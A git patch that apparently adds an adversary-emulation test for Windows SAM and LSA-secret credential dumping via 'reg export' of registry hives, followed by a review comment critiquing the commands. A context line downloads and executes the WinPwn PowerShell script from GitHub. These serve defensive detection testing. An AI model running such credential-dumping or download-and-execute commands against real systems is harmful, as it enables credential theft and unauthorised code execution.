From 600767fccabe383fb7f942e20c0bc83e042247a7 Mon Sep 17 00:00:00 2001 From: NeuralGlitch <107919127+NagaSivaGunturu@users.noreply.github.com> Date: Fri, 5 Jul 2024 22:16:48 +0530 Subject: [PATCH] Update T1003.002.yaml (#2826) new atomic test added Co-authored-by: Carrie Roberts --- atomics/T1003.002/T1003.002.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 5b7ea970..2da85875 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -172,3 +172,21 @@ atomic_tests: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') samfile -consoleoutput -noninteractive name: powershell + +- name: Dumping of SAM, creds, and secrets(Reg Export) + description: | + Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior + Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory. + supported_platforms: + - windows + executor: + command: | + reg export HKLM\sam %temp%\sam + reg export HKLM\system %temp%\system + reg export HKLM\security %temp%\security + cleanup_command: | + del %temp%\sam >nul 2> nul + del %temp%\system >nul 2> nul + del %temp%\security >nul 2> nul + name: command_prompt + elevation_required: true
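Review bot: The three `reg export` lines in the new test are unlikely to produce the SAM/SECURITY dumps the description promises: unlike `reg save`, `reg export` opens the keys with ordinary read access and no backup privilege, so with default ACLs I would expect `HKLM\SAM\SAM` and `HKLM\SECURITY` to return "Access is denied" even from an elevated prompt, and the `system` output is a text-format .reg export rather than a hive that creddump-style tools can parse. Either change the three lines to `reg save` (if the file already holds that variant, as the test name suggests, the new test would then be a duplicate) or reword the description to state that the test exercises the export attempt and that the sam/security exports are expected to fail, so the "you will find three files" sentence is not misleading. Independently, `reg export` prompts before overwriting an existing file, which can hang a non-interactive executor when a previous run's cleanup did not complete; append `/y` to each line, e.g. `reg export HKLM\sam %temp%\sam /y`. The sentence "Used reg export to execute this behavior" also reads as a fragment; suggest "This variant uses `reg export` instead of `reg save`."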